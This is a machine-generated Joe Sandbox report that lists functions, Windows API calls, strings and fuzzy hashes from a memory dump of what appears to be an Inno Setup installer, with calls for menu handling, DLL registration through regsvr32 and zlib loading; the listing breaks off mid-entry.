                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1694776339-0
                                                                                                                                                                      • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                                      • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                                      • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004221E0 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemMenu.USER32(00000000,00000000), ref: 0042222B
                                                                                                                                                                      • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422249
                                                                                                                                                                      • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422256
                                                                                                                                                                      • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422263
                                                                                                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422270
                                                                                                                                                                      • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042227D
                                                                                                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042228A
                                                                                                                                                                      • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422297
                                                                                                                                                                      • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222B5
                                                                                                                                                                      • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Delete$EnableItem$System
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3985193851-0
                                                                                                                                                                      • Opcode ID: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                                                                                                                      • Instruction ID: 3d512aed001548988d9f6823c75d43677a46120aeb5bb01c9b252fa7414fdf33
                                                                                                                                                                      • Opcode Fuzzy Hash: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                                                                                                                      • Instruction Fuzzy Hash: 692144703407447AE720E724DD8BFABBBD8AB04708F1455A5B6487F6D3C2F9AB804698
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00480E18 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00480FD5
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00480FE9
                                                                                                                                                                      • SendNotifyMessageA.USER32(000801FA,00000496,00002710,00000000), ref: 0048105B
                                                                                                                                                                      Strings
                                                                                                                                                                      • GetCustomSetupExitCode, xrefs: 00480E75
                                                                                                                                                                      • Deinitializing Setup., xrefs: 00480E36
                                                                                                                                                                      • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048100A
                                                                                                                                                                      • Restarting Windows., xrefs: 00481036
                                                                                                                                                                      • DeinitializeSetup, xrefs: 00480ED1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeLibrary$MessageNotifySend
                                                                                                                                                                      • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                                                                                      • API String ID: 3817813901-1884538726
                                                                                                                                                                      • Opcode ID: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                                                                                                                      • Instruction ID: 3a7bead0d2027120b4b43806ed62f13ca717c16daae07b60498e62be9a129c9c
                                                                                                                                                                      • Opcode Fuzzy Hash: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                                                                                                                      • Instruction Fuzzy Hash: 6E5191307042409FD711EB65D9A5B6E77E8EB5A304F50887BF900D73A2CB38A849CB9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042F558 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetActiveWindow.USER32 ref: 0042F587
                                                                                                                                                                      • GetFocus.USER32 ref: 0042F58F
                                                                                                                                                                      • RegisterClassA.USER32(004997AC), ref: 0042F5B0
                                                                                                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F684,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5EE
                                                                                                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F634
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F645
                                                                                                                                                                      • SetFocus.USER32(00000000,00000000,0042F667,?,?,?,00000001,00000000,?,00458172,00000000,0049B628), ref: 0042F64C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                                                                                      • String ID: TWindowDisabler-Window
                                                                                                                                                                      • API String ID: 3167913817-1824977358
                                                                                                                                                                      • Opcode ID: f7801bb8b74b4bbd46ccb7e2af213faffd861715e1dd86ccd8dcc38b86cd259b
                                                                                                                                                                      • Instruction ID: 4511064fd05a7bbda13c40d4eeb951e72c3c37d4b9ac5deb9698ad8496ae2c71
                                                                                                                                                                      • Opcode Fuzzy Hash: f7801bb8b74b4bbd46ccb7e2af213faffd861715e1dd86ccd8dcc38b86cd259b
                                                                                                                                                                      • Instruction Fuzzy Hash: B621A171740710BAE220EF61AD43F1A76B8EB14B04F91453BF504AB2E1D7B9AD0586AD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004614B4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 004614EF
                                                                                                                                                                      • GetActiveWindow.USER32 ref: 00461553
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00461567
                                                                                                                                                                      • SHBrowseForFolder.SHELL32(?), ref: 0046157E
                                                                                                                                                                      • 77218160.OLE32(004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 00461593
                                                                                                                                                                      • SetActiveWindow.USER32(?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615A9
                                                                                                                                                                      • SetActiveWindow.USER32(?,?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615B2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ActiveWindow$77218160BrowseFolderInitializeMalloc
                                                                                                                                                                      • String ID: A
                                                                                                                                                                      • API String ID: 2438507569-3554254475
                                                                                                                                                                      • Opcode ID: effc5760804a54be5c933b1f68c149c405685461b0cf1a9aa40f9e60b7d70451
                                                                                                                                                                      • Instruction ID: 3b7aa7431835c7c777c0b5d0eb650662cb24b1be5a668883a221ebb7e5be7499
                                                                                                                                                                      • Opcode Fuzzy Hash: effc5760804a54be5c933b1f68c149c405685461b0cf1a9aa40f9e60b7d70451
                                                                                                                                                                      • Instruction Fuzzy Hash: 05310F70D00218AFDB00EFA6D885A9EBBF8EF09304F55847AF415E7251E6789A04CB5A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004727E0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD,?,?,00000000,00472D6C), ref: 00472804
                                                                                                                                                                        • Part of subcall function 0042CD8C: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE02
                                                                                                                                                                        • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD), ref: 0047287B
                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000), ref: 00472881
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                                                                                      • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                                                                                      • API String ID: 884541143-1710247218
                                                                                                                                                                      • Opcode ID: d8d945c3f6ff0229c73f8962de5754ae8082817b7fae39e8a437f1a4973994a1
                                                                                                                                                                      • Instruction ID: 279d6da86f281c7a9c803d865f3c4407023b84140d9db6ac64499a617a38ab60
                                                                                                                                                                      • Opcode Fuzzy Hash: d8d945c3f6ff0229c73f8962de5754ae8082817b7fae39e8a437f1a4973994a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A11E270B005147BDB01F6658D82BAE73ACDB45754F62827BB804A72C1DB7C9E028A1E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0045D0D4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D0DD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D0ED
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D0FD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D10D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                                                                                      • API String ID: 190572456-3516654456
                                                                                                                                                                      • Opcode ID: 70275fcd54e213399dc361b7cb2da2745a702afa533a016c0f958b62a3e74d6a
                                                                                                                                                                      • Instruction ID: 76eb10cdb098e6f3740e4570fa0e0ca14f9d337f92906be3718b60d9f676c82f
                                                                                                                                                                      • Opcode Fuzzy Hash: 70275fcd54e213399dc361b7cb2da2745a702afa533a016c0f958b62a3e74d6a
                                                                                                                                                                      • Instruction Fuzzy Hash: 800112B0D01B00DAE724DFB69DD572736A5ABA4306F10C13B9C49D62A2D77D0859DF2C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041A8D4 Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041A9B1
                                                                                                                                                                      • 74074E40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A9EB
                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0041AA00
                                                                                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA4A
                                                                                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AA55
                                                                                                                                                                      • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA65
                                                                                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAA4
                                                                                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AAAE
                                                                                                                                                                      • SetBkColor.GDI32(00000000,?), ref: 0041AABB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$StretchText$74074
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 490073292-0
                                                                                                                                                                      • Opcode ID: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                                                                                                                                      • Instruction ID: f35f62ab74b2522f6310a7e8d9a92b24202350a16c816e0881424610f10e5e30
                                                                                                                                                                      • Opcode Fuzzy Hash: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F61C7B5A00105AFCB40EFADD985E9EB7F8EF08314B1085AAF518DB262C735ED408F58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00457EE4 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458098,?, /s ",?,regsvr32.exe",?,00458098), ref: 0045800A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDirectoryHandleSystem
                                                                                                                                                                      • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                                                                                      • API String ID: 2051275411-1862435767
                                                                                                                                                                      • Opcode ID: a4d3fa780c79a36ce6c21ec593dd48e97bb5026480f913e46527351730233248
                                                                                                                                                                      • Instruction ID: 56a02eb2220928eb4cb829bb83c6f501b915172eb664170f25c545f5d36e4a23
                                                                                                                                                                      • Opcode Fuzzy Hash: a4d3fa780c79a36ce6c21ec593dd48e97bb5026480f913e46527351730233248
                                                                                                                                                                      • Instruction Fuzzy Hash: 80413670A003086BDB10EFE5D842B8EB7B9AF44705F50407FA904BB297DF789A0D8B19
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0044D170 Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A1
                                                                                                                                                                      • GetSysColor.USER32(00000014), ref: 0044D1A8
                                                                                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C0
                                                                                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1E9
                                                                                                                                                                      • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1F3
                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 0044D1FA
                                                                                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D212
                                                                                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D23B
                                                                                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D266
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Text$Color$Draw$OffsetRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1005981011-0
                                                                                                                                                                      • Opcode ID: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                                                                                                                                      • Instruction ID: 3fa3981ec5684e07db84b004592342e93505d63b705e9416633fcf0049301179
                                                                                                                                                                      • Opcode Fuzzy Hash: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A21CEB46415047FC710FB2ACC8AE8BBBECDF19319B00457AB958EB392C678DE404668
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00466FA8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                                                                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                                                                                                                                        • Part of subcall function 00466EE8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466F80
                                                                                                                                                                        • Part of subcall function 00466EE8: DestroyCursor.USER32(00000000), ref: 00466F96
                                                                                                                                                                      • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                                                                                                                                      • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467129
                                                                                                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046714F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                                                                                      • String ID: c:\directory$shell32.dll
                                                                                                                                                                      • API String ID: 3376378930-1375355148
                                                                                                                                                                      • Opcode ID: 58482251426f663546b4fc077b8c106d7bcfa5d478db0fcffb01e555e9d37942
                                                                                                                                                                      • Instruction ID: 289419416c676a83544b633f3186a9d007cfc28e75d1c6b72818de0571a1fc75
                                                                                                                                                                      • Opcode Fuzzy Hash: 58482251426f663546b4fc077b8c106d7bcfa5d478db0fcffb01e555e9d37942
                                                                                                                                                                      • Instruction Fuzzy Hash: ED515E74604244AFDB11DF65DD85FCFB7A8EB49308F5081B7F40897352D638AE81CA59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00495A00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
